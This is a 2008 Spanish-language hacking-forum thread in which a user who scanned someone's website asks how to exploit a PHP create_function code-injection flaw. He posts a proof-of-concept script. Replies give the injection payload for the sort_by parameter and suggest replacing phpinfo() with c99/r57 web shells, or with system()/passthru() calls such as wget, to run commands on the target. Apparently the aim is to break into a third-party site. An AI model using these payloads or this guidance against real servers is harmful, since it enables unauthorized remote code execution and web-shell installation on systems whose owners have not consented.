elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  ¿Cómo explotar esta vulnerabilidad?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Cómo explotar esta vulnerabilidad?  (Leído 6,564 veces)
rixi15

Desconectado Desconectado

Mensajes: 66



Ver Perfil
¿Cómo explotar esta vulnerabilidad?
« en: 15 Octubre 2008, 15:23 pm »

Bueno he analizado una web y he encontrado este bug:

 
Código:
Web Servers : PHP create_function Code Injection Weakness
Port 80 
Description PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.This weakness is reported in PHP 5.2.6; other versions may also be affected. 
How to fix Upgrade to the current version of PHP. 
Risk level High 
Related Links PHP HomePage.
 
CVE CVE-MAP-NOMATCH 
Bugtraq ID 31398 


he buscado y tengo este explot en php
Código:
<?php
# call as test.php?sort_by="]);}phpinfo();/*
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';


usort($databases, create_function('$a, $b', $sort_function));

?>

Alguien sabe como lo puedo utilizar?
Gracias
« Última modificación: 19 Octubre 2008, 04:13 am por sirdarckcat » En línea

nitr0us

Desconectado Desconectado

Mensajes: 208


#rm -fr /


Ver Perfil WWW
Re: ¿Cómo explotar esta vulnerabilidad?
« Respuesta #1 en: 15 Octubre 2008, 18:46 pm »



Citar
Web Servers : PHP create_function Code Injection Weakness

Inyección de código en la función create_function(), y en el exploit vemos:

Citar
$sort_by=stripslashes($_GET[sort_by]);
User-input = $sort_by

Citar
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';
$sort_function incluye $sort_by

Citar
usort($databases, create_function('$a, $b', $sort_function));
Entonces, create_function() es llamado con datos del usuario, el cual no sanitiza y lo parasea.

En el exploit viene una forma de usarlo:
Citar
# call as test.php?sort_by="]);}phpinfo();/*

Guardas el exploit como test.php y lo llamas como http://0xdeadb33f.gov/test.php?sort_by="]);}phpinfo();/*
Y el resultado debe ser la salida de phpinfo().

Eso es un simple Proof of Concept, en la vida real, debes hacer revisión de código para buscar las llamadas a create_function() y analizar si la función recibe datos de usuario (directa o indirectamente). Si es así, entonces, podrías cambiar tu phpinfo() por un bonit c99 o un r57 (php shells) jeje.

SaluD.o.S
« Última modificación: 15 Octubre 2008, 20:36 pm por nitr0us » En línea

Bender-Deicide


Desconectado Desconectado

Mensajes: 2.662



Ver Perfil WWW
Re: ¿Cómo explotar esta vulnerabilidad?
« Respuesta #2 en: 16 Octubre 2008, 03:13 am »

rixi te veo conocido? ajaj como andas?

Me desvie pero bueno y te sirvio lo que te dijo el colega?
En línea

i7 860 @ 2.8 Ghz
Asus Sabertooth 55i
2X2 GB DDR3 1600 Geil Evo Two
Samsung SpinPoint 500GB SATA II 16MB Buffer
WD Green 1 TB SATA II 64MB Buffer
Gab Satellite 511K (Black)
Satellite SL-8600EPS 600watts
MSI HD5750 1GB GDDR5
rixi15

Desconectado Desconectado

Mensajes: 66



Ver Perfil
Re: ¿Cómo explotar esta vulnerabilidad?
« Respuesta #3 en: 16 Octubre 2008, 15:18 pm »

jeje hola huemulito no sabia que estabas en este foro
si me ha servido pero no me ha quedado muy claro como llamo al explot
con rfi o como
En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.185


>.<


Ver Perfil WWW
Re: ¿Cómo explotar esta vulnerabilidad?
« Respuesta #4 en: 16 Octubre 2008, 16:52 pm »

lo subes al server y lo ejecutas, si no lo podes subir directamente entonces con rfi como has mencionado, el "chiste" es que se ejecute en el server "afectado" :)

se me ocurre que en lugar de poner "phpinfo()" podrias usar system() o alguna variante :P

passthru() creo que tambien funca... y claro, enviarle comandos... tal vez...

system("wget...")...

En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: ¿Cómo explotar esta vulnerabilidad?
« Respuesta #5 en: 18 Octubre 2008, 01:03 am »

No creo que tenga permisos para usar system or passthru, pero nunca hace mal probar.
En línea

[/url]
OssoH


Desconectado Desconectado

Mensajes: 844


Ver Perfil
Re: ¿Cómo explotar esta vulnerabilidad?
« Respuesta #6 en: 17 Noviembre 2008, 15:29 pm »

Tengo una web y me gustaria saber que programa usan para encontrarle vulnerabilidades ya que en ese caso me gustaría resolver el problema para hacerla más segura. La web consiste en una aplicación de gestión usuario/contraseña sin SSL. Supongo que es sin SSL ya que no me aparece el candado de seguridad al lado de la URL del navegador. ¿Me aconsejan SSL?
Gracias
En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.547


🏴 Libertad!!!!!


Ver Perfil WWW
Re: ¿Cómo explotar esta vulnerabilidad?
« Respuesta #7 en: 17 Noviembre 2008, 15:50 pm »



Eso es un simple Proof of Concept, en la vida real, debes hacer revisión de código para buscar las llamadas a create_function() y analizar si la función recibe datos de usuario (directa o indirectamente). Si es así, entonces, podrías cambiar tu phpinfo() por un bonit c99 o un r57 (php shells) jeje.

Esta intersante, voy a provarlo ahora mismo en mi servidor local.

SaluD.o.S


Jajaja  :laugh: :laugh: Que buen chiste

Igualemte Saludos y Gracias.


ss ss ss  Smurfff!!! a perdon esque estornude, estoy algo enfermo :xD
En línea

Donaciones
1ABSD1rMTmNZHJrJP8AJhDNG1XbQjWcRz7
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines